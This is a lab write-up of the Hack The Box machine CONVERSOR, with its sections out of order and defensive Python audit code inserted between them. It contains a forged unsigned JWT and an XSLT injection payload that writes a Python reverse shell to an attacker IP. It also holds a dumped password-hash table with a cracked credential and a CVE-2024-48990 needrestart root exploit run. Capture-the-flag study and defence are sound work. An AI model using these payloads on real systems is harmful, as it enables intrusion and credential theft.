CONVERSOR-HTB Notes

CONVERSOR-HTB

Here are my notes on the CONVERSOR box from Hack The Box.

CONVERSOR: 10.129.189.109

Running all scans on 10.129.189.109

Host is likely running Linux


---------------------Starting Port Scan-----------------------



PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http



---------------------Starting Script Scan-----------------------



PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 0174263947bc6ae2cb128b71849cf85a (ECDSA)
|_  256 3a1690dc74d8e3c45136e208062617ee (ED25519)

#FROM /var/www/conversor.htb/instance/users.db:

[SNIP]

fismathack:5b5c3ac3a1c897c94caad48e6c71fdec:Keepmesafeandwarm

[SNIP]

ssh fismathack@conversor.htb

[SNIP]

fismathack@conversor:~$ whoami
fismathack
fismathack@conversor:~$ hostname
conversor


conversor SHELL !

fismathack@conversor:~$ whoami
fismathack
fismathack@conversor:~$ hostname
conversor
fismathack@conversor:~$ ls
importlib  user.txt
fismathack@conversor:~$ cat user.txt
[REDACTED]

USER.TXT: [REDACTED]

PRIV ESC:

fismathack -> root:

needrestart (sudo -l) PRIV ESC NOTES:

fismathack@conversor:~$ sudo -l
Matching Defaults entries for fismathack on conversor:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User fismathack may run the following commands on conversor:
    (ALL : ALL) NOPASSWD: /usr/sbin/needrestart
fismathack@conversor:~$ needrestart --version

needrestart 3.7 - Restart daemons after library updates.

CVE-2024-48990 - Needrestart 3.7-3 Privilege Escalation Exploit

https://github.com/ten-ops/CVE-2024-48990_needrestart

https://github.com/Serner77/CVE-2024-48990-Automatic-Exploit  #WORKS ! 


┌──(root㉿kali)-[/home/kali/BOXES/CONVERSOR/CVE-2024-48990-Automatic-Exploit]
└─# python3 exploit.py --user fismathack --host 10.10.11.92 --att-ip 10.10.14.208 --ssh-pass Keepmesafeandwarm
[*] Compiling payload __init__.so ...
[*] HTTP server running at http://10.10.14.208:8000/__init__.so
[*] Connecting to fismathack@10.10.11.92 ...
[*] Uploading remote exploit script...
[*] Executing exploit remotely...
PWD python3 e.py >/dev/null 2>&1 &
> echo "[*] Bait PID: $(echo $!)"
> sleep 2
>
> echo "[*] Running needrestart..."
> sudo /usr/sbin/needrestart || true
>
> echo "[*] Checking if /tmp/poc was created..."
> if [ -f /tmp/poc ]; then
>   echo "[+] Exploit successful: executing root shell..."
>   /tmp/poc -p
> else
>   echo "[-] /tmp/poc not found. Exploit failed or target not vulnerable."
> fi
> EOF
fismathack@conversor:~$ chmod +x /tmp/exploit.sh
fismathack@conversor:~$ bash /tmp/exploit.sh
[*] Preparing malicious environment...
[*] Creating bait script e.py...
[*] Launching bait process with malicious PYTHONPATH...
[*] Bait PID: 7694
[*] Running needrestart...
Scanning processes...
Scanning candidates...
Scanning linux images...

Running kernel seems to be up-to-date.

Restarting services...
 systemctl restart cron.service

No containers need to be restarted.

No user sessions are running outdated binaries.

No VM guests are running outdated hypervisor (qemu) binaries on this host.
[*] Checking if /tmp/poc was created...
[+] Exploit successful: executing root shell...
poc-5.1# whoami
root

ROOT-SHELL ! 

poc-5.1# whoami
root
poc-5.1# hostname
conversor
poc-5.1# ls
root.txt  scripts
poc-5.1# cat root.txt
[REDACTED]

ROOT.TXT: [REDACTED]
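Host-side check for the exposure used above, as an added example (my code, not from the box or the exploit repositories). It parses the `needrestart --version` and `sudo -l` output recorded in these notes and a constructed needrestart.conf; the fixed version (3.8) and the `$nrconf{interpscan} = 0;` mitigation are taken from the upstream fix and the Qualys advisory for CVE-2024-48990, not from this page.

```python
"""Added example: audit a host for the needrestart exposure seen on CONVERSOR.

Constructed check, not code from the box. Sample outputs are copied from the
notes above; the config texts are constructed.
"""
import re

# CVE-2024-48990 was fixed in needrestart 3.8 (upstream; assumption stated in lead-in).
FIXED_VERSION = (3, 8)

# Copied from the notes: `needrestart --version` and `sudo -l` on the box.
VERSION_OUTPUT = "needrestart 3.7 - Restart daemons after library updates."
SUDO_L_OUTPUT = """Matching Defaults entries for fismathack on conversor:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin, use_pty

User fismathack may run the following commands on conversor:
    (ALL : ALL) NOPASSWD: /usr/sbin/needrestart
"""

# Constructed /etc/needrestart/needrestart.conf fragments: default, and with
# interpreter scanning disabled (the documented mitigation for CVE-2024-48990).
DEFAULT_CONF = "# constructed default config\n$nrconf{restart} = 'i';\n"
MITIGATED_CONF = DEFAULT_CONF + "$nrconf{interpscan} = 0;\n"


def parse_needrestart_version(output: str):
    """Extract (major, minor) from `needrestart --version` output, or None."""
    m = re.search(r"needrestart\s+(\d+)\.(\d+)", output)
    return (int(m.group(1)), int(m.group(2))) if m else None


def nopasswd_rules(sudo_l_output: str) -> list:
    """Return the command paths a user may run with NOPASSWD, from `sudo -l` output."""
    rules = []
    for line in sudo_l_output.splitlines():
        m = re.match(r"\s*\(([^)]*)\)\s+NOPASSWD:\s*(.+)$", line)
        if m:
            rules.extend(p.strip() for p in m.group(2).split(","))
    return rules


def interpscan_disabled(conf_text: str) -> bool:
    """True when needrestart.conf sets $nrconf{interpscan} = 0 (interpreter scanning off)."""
    return re.search(r"^\s*\$nrconf\{interpscan\}\s*=\s*0\s*;", conf_text, re.M) is not None


def assess(version_output: str, sudo_l_output: str, conf_text: str) -> dict:
    """Combine version, sudo policy and config into a list of findings."""
    version = parse_needrestart_version(version_output)
    rules = nopasswd_rules(sudo_l_output)
    findings = []
    if version and version < FIXED_VERSION and not interpscan_disabled(conf_text):
        findings.append(
            f"needrestart {version[0]}.{version[1]} is older than 3.8 and interpreter "
            "scanning is enabled: patch, or set $nrconf{interpscan} = 0; (CVE-2024-48990)"
        )
    if "/usr/sbin/needrestart" in rules:
        findings.append(
            "sudo allows needrestart without a password; combined with the above this is "
            "a direct path to root for that user"
        )
    return {"version": version, "nopasswd": rules, "findings": findings}


if __name__ == "__main__":
    for finding in assess(VERSION_OUTPUT, SUDO_L_OUTPUT, DEFAULT_CONF)["findings"]:
        print("[!]", finding)
```

Either fix alone closes the chain seen here: upgrading past 3.7 removes the PYTHONPATH-honouring interpreter scan, and disabling `interpscan` in the config avoids it on hosts that cannot be upgraded yet.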

80/tcp open  http    Apache httpd 2.4.52
|_http-title: Did not follow redirect to http://conversor.htb/
|_http-server-header: Apache/2.4.52 (Ubuntu)

http://conversor.htb/login

NO SQL LOGIN BYPASS. 

NO DEFAULT CREDS. 

Register an account as usual: qwop:qwop

Cookie: session=eyJ1c2VyX2lkIjo3LCJ1c2VybmFtZSI6InF3b3AifQ.aQZSbQ.FTpTGgqQG9uHvDVoBfU3ZrH5lE0

Decode this JWT: 

{
  "user_id": 7,
  "username": "qwop"
}

Encode it

{
  "user_id": 1,
  "username": "admin"
}

eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJ1c2VyX2lkIjoxLCJ1c2VybmFtZSI6ImFkbWluIn0.


From the main page: "All you need to do is upload your XML file along with the XSLT sheet to transform it into a more aesthetic format."

The site converts nmap XML scan output using an XSLT sheet, so generate one:

nmap -sS -sV -O -p- 10.129.189.109 -oX scan-output.xml

sudo gobuster dir -u http://conversor.htb/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 40 -x sh,txt,php,html,htm,asp,aspx,js,xml,log,json,jpg,jpeg,png,gif,doc,pdf,mpg,mp3,zip,tar.gz,tar


It's vulnerable to XSLT injection. 

XSLT Injection:

Download nmap.xslt from the main page.

Run an nmap scan with -oX and turn it into nmap.xml as usual.

We modify nmap.xslt into a probe stylesheet and upload it together with nmap.xml.

nmap.xslt probe:

[SNIP]

<xsl:for-each select="ports/port">
                <tr>
                  <td><xsl:value-of select="system-property('xsl:version')"/></td>
                  <td><xsl:value-of select="system-property('xsl:vendor')"/></td>
                  <td><xsl:value-of select="system-property('xsl:vendor-url')"/></td>
                  <td>
                    <xsl:attribute name="class">
                      <xsl:value-of select="system-property('xsl:product-name')"/>
                    </xsl:attribute>
                    <xsl:value-of select="system-property('xsl:product-version')"/>
                  </td>
                </tr>
              </xsl:for-each>
[SNIP]

WORKS !!!

The rendered table's Port/Protocol/Service/State columns now carry the system-property() values instead of scan data:

Port	Protocol	Service	State
1.0	libxslt	http://xmlsoft.org/XSLT/	
1.0	libxslt	http://xmlsoft.org/XSLT/

https://www.hackervice.com/server-side-vulnerabilities/server-side-attacks/xslt-injection/exploiting-xslt-injection

https://medium.com/@adipsharif/attacking-xslt-in-web-applications-ea538a8fb9d0

https://bughra.dev/posts/xslt/#xslt-processor-specific-attacks


XSLT 1.0

    Limited functionality
    No native file/system access (file writes need an extension such as EXSLT document)

XSLT-Injection-Reverse-Shell:

https://github.com/ex-cal1bur/XSLT-Injection_reverse-shell/

┌──(root㉿kali)-[/home/kali/BOXES/CONVERSOR/XSLT-Injection_reverse-shell]
└─# cat caller.xml
<?xml version="1.0"?>
<revshell>test</revshell>

┌──(root㉿kali)-[/home/kali/BOXES/CONVERSOR/XSLT-Injection_reverse-shell]
└─# cat malicious.xslt
<?xml version="1.0" encoding="UTF-8"?>
<xsl:stylesheet
        xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
    xmlns:ptswarm="http://exslt.org/common"
    extension-element-prefixes="ptswarm"
    version="1.0">
<xsl:template match="/">
  <ptswarm:document href="/var/www/conversor.htb/scripts/test2.py" method="text">
import os

os.system(
    "python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.208\",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"])'"
)
  </ptswarm:document>
</xsl:template>
</xsl:stylesheet>

Upload those two files to gain a shell:

sudo rlwrap nc -lnvp 1234
listening on [any] 1234 ...
connect to [10.10.14.208] from (UNKNOWN) [10.10.11.92] 49864
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ hostname
conversor
$ env
HOME=/var/www
LOGNAME=www-data
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
LANG=en_US.UTF-8
SHELL=/bin/sh
PWD=/var/www

USER-SHELL !
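The two behaviours used above, the system-property() leak and the EXSLT document write, are exactly what lxml's XSLTAccessControl is meant to constrain. Added example (mine, not code from the box, its app.py, or the reverse-shell repository): the same constructed stylesheet is run once with libxslt's defaults and once under DENY_ALL, writing only a harmless marker to a temp file. lxml is a third-party dependency and is assumed to be installed.

```python
"""Added example: sandboxing a user-supplied XSLT stylesheet with lxml.

Constructed demo, not code from the box or its author. The stylesheet is a
constructed stand-in for an untrusted upload; the output path is a temp file.
"""
import os
import tempfile

try:
    from lxml import etree
    HAVE_LXML = True
except ImportError:  # third-party dependency; demo() reports it as unavailable
    HAVE_LXML = False

# Constructed input document standing in for an uploaded nmap.xml.
XML_DOC = b"<nmaprun><host><ports><port portid='80'/></ports></host></nmaprun>"

# Constructed stylesheet: leaks the processor identity through system-property()
# and tries to write a file through the EXSLT document extension element,
# the two behaviours seen in the notes above.
XSLT_TEMPLATE = """<?xml version="1.0"?>
<xsl:stylesheet version="1.0"
    xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
    xmlns:exsl="http://exslt.org/common"
    extension-element-prefixes="exsl">
  <xsl:template match="/">
    <exsl:document href="{href}" method="text">written by stylesheet</exsl:document>
    <out><xsl:value-of select="system-property('xsl:vendor')"/></out>
  </xsl:template>
</xsl:stylesheet>
"""


def run_transform(stylesheet: str, xml_doc: bytes, sandbox: bool) -> dict:
    """Apply an untrusted stylesheet; report whether libxslt refused the file write."""
    xslt_root = etree.XML(stylesheet.encode())
    # DENY_ALL turns off document() reads, include/import fetches and exsl:document writes.
    access = etree.XSLTAccessControl.DENY_ALL if sandbox else None
    xform = etree.XSLT(xslt_root, access_control=access)
    try:
        result = xform(etree.XML(xml_doc))
    except etree.XSLTApplyError as exc:
        # libxslt aborts the transform when a denied write is attempted
        return {"blocked": True, "vendor": None, "error": str(exc)}
    return {"blocked": False, "vendor": result.getroot().text, "error": None}


def demo() -> dict:
    """Run the same stylesheet unsandboxed and sandboxed against a temp output path."""
    if not HAVE_LXML:
        return {"available": False}
    with tempfile.TemporaryDirectory() as tmp:
        target = os.path.join(tmp, "dropped.txt")
        sheet = XSLT_TEMPLATE.format(href=target)
        unsafe = run_transform(sheet, XML_DOC, sandbox=False)
        unsafe["file_written"] = os.path.exists(target)
        if unsafe["file_written"]:
            os.remove(target)
        safe = run_transform(sheet, XML_DOC, sandbox=True)
        safe["file_written"] = os.path.exists(target)
    return {"available": True, "unsafe": unsafe, "safe": safe}


if __name__ == "__main__":
    print(demo())
```

The access-control object stops the write (and document()/include reads), but it does not hide system-property() values; the only complete fix for a converter like this one is to not accept attacker-controlled stylesheets at all, or to run the transform in an isolated worker with no access to the web root.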

PRIV ESC:

www-data -> fismathack:

python3 -c 'import pty; pty.spawn("/bin/bash")'

www-data@conversor:~/conversor.htb$ ls
ls
app.py  app.wsgi  instance  __pycache__  scripts  static  templates  uploads
www-data@conversor:~/conversor.htb$ cat app.wsgi
cat app.wsgi
import sys
sys.path.insert(0, "/var/www/conversor.htb")

from app import app as application
www-data@conversor:~/conversor.htb$ cat app.py
cat app.py
from flask import Flask, render_template, request, redirect, url_for, session, send_from_directory
import os, sqlite3, hashlib, uuid

app = Flask(__name__)
app.secret_key = 'C0nv3rs0rIsthek3y29'

BASE_DIR = os.path.dirname(os.path.abspath(__file__))
DB_PATH = '/var/www/conversor.htb/instance/users.db'
UPLOAD_FOLDER = os.path.join(BASE_DIR, 'uploads')
os.makedirs(UPLOAD_FOLDER, exist_ok=True)
[SNIP] 

www-data@conversor:~/conversor.htb$ cd instance
cd instance
www-data@conversor:~/conversor.htb/instance$ ls
ls
test  users.db
www-data@conversor:~/conversor.htb/instance$ ls -lah
ls -lah
total 36K
drwxr-x--- 2 www-data www-data 4.0K Nov  2 17:36 .
drwxr-x--- 8 www-data www-data 4.0K Aug 14 21:34 ..
-rw-r--r-- 1 www-data www-data   10 Nov  2 16:08 test
-rwxr-x--- 1 www-data www-data  24K Nov  2 17:36 users.db
www-data@conversor:~/conversor.htb/instance$ sqlite3 users.db
sqlite3 users.db
SQLite version 3.37.2 2022-01-06 13:25:41
Enter ".help" for usage hints.

sqlite> .tables
.tables
files  users
sqlite> select * from users
select * from users
   ...> ;
;
1|fismathack|5b5c3ac3a1c897c94caad48e6c71fdec
5|aaa|47bce5c74f589f4867dbd57e9ca9f808
6|testuser|e16b2ab8d12314bf4efbd6203906ea6c
7|abc|4ed9407630eb1000c0f6b63842defa7d
8|administrator|200ceb26807d6bf99fd6f4f0d1ca54d4
9|testtest|098f6bcd4621d373cade4e832627b4f6
10|Whytee|5737c6ec2e0716f3d8a7a5c4e0de0d9a
11|admin|21232f297a57a5a743894a0e4a801fc3
12|vaish|10487c8581423e8b2fbeed2b21c2cc53
13|admin12|21232f297a57a5a743894a0e4a801fc3
14|conca|6b30397d34e49c49e08a2f555b87956e
15|test|098f6bcd4621d373cade4e832627b4f6


fismathack:5b5c3ac3a1c897c94caad48e6c71fdec:Keepmesafeandwarm
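Why this table fell so quickly: every hash is a bare 32-hex digest with no salt, and identical hashes appear under different accounts (testtest/test, admin/admin12), which is only possible without per-user salting. Added example (my code, not the box's app.py): an audit over the rows dumped above plus the replacement scheme, salted PBKDF2-HMAC-SHA256 via the standard library, which the app's `hashlib` import already provides.

```python
"""Added example: audit a users table for unsalted hashes and fix the storage scheme.

Constructed demo. USER_ROWS is copied from the users.db dump in the notes;
the audit and hashing functions are this example's own, not the box's app.py.
"""
import hashlib
import hmac
import os
import re
from collections import defaultdict
from typing import Optional

# (id, username, password_hash) as dumped from users.db above.
USER_ROWS = [
    (1, "fismathack", "5b5c3ac3a1c897c94caad48e6c71fdec"),
    (5, "aaa", "47bce5c74f589f4867dbd57e9ca9f808"),
    (6, "testuser", "e16b2ab8d12314bf4efbd6203906ea6c"),
    (7, "abc", "4ed9407630eb1000c0f6b63842defa7d"),
    (8, "administrator", "200ceb26807d6bf99fd6f4f0d1ca54d4"),
    (9, "testtest", "098f6bcd4621d373cade4e832627b4f6"),
    (10, "Whytee", "5737c6ec2e0716f3d8a7a5c4e0de0d9a"),
    (11, "admin", "21232f297a57a5a743894a0e4a801fc3"),
    (12, "vaish", "10487c8581423e8b2fbeed2b21c2cc53"),
    (13, "admin12", "21232f297a57a5a743894a0e4a801fc3"),
    (14, "conca", "6b30397d34e49c49e08a2f555b87956e"),
    (15, "test", "098f6bcd4621d373cade4e832627b4f6"),
]

# A bare 128-bit hex digest with no scheme prefix or salt field: MD5-shaped storage.
UNSALTED_DIGEST = re.compile(r"^[0-9a-f]{32}$")
PBKDF2_ITERATIONS = 600_000  # OWASP-recommended order of magnitude for PBKDF2-HMAC-SHA256


def audit_password_hashes(rows) -> dict:
    """Flag unsalted digests and hashes shared by more than one account."""
    unsalted = [user for _, user, digest in rows if UNSALTED_DIGEST.match(digest)]
    by_hash = defaultdict(list)
    for _, user, digest in rows:
        by_hash[digest].append(user)
    # Two accounts with the same stored hash chose the same password AND no salt was used.
    shared = {digest: users for digest, users in by_hash.items() if len(users) > 1}
    return {"unsalted": unsalted, "shared": shared}


def hash_password(password: str, salt: Optional[bytes] = None) -> str:
    """Salted PBKDF2-HMAC-SHA256, stored as scheme$iterations$salt$digest."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)
    return f"pbkdf2_sha256${PBKDF2_ITERATIONS}${salt.hex()}${digest.hex()}"


def verify_password(stored: str, candidate: str) -> bool:
    """Recompute with the stored salt and iteration count; compare in constant time."""
    try:
        scheme, iterations, salt_hex, digest_hex = stored.split("$")
    except ValueError:
        return False
    if scheme != "pbkdf2_sha256":
        return False
    digest = hashlib.pbkdf2_hmac(
        "sha256", candidate.encode(), bytes.fromhex(salt_hex), int(iterations)
    )
    return hmac.compare_digest(digest.hex(), digest_hex)


if __name__ == "__main__":
    report = audit_password_hashes(USER_ROWS)
    print(f"{len(report['unsalted'])} accounts use unsalted digests")
    for digest, users in report["shared"].items():
        print(f"hash {digest} shared by {', '.join(users)}")
```

A migration would keep the old column, verify a login against the legacy digest once, and rewrite the row with `hash_password()` on success; identical-hash pairs like the two shown here disappear as soon as every user has a random salt.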
Service Info: Host: conversor.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel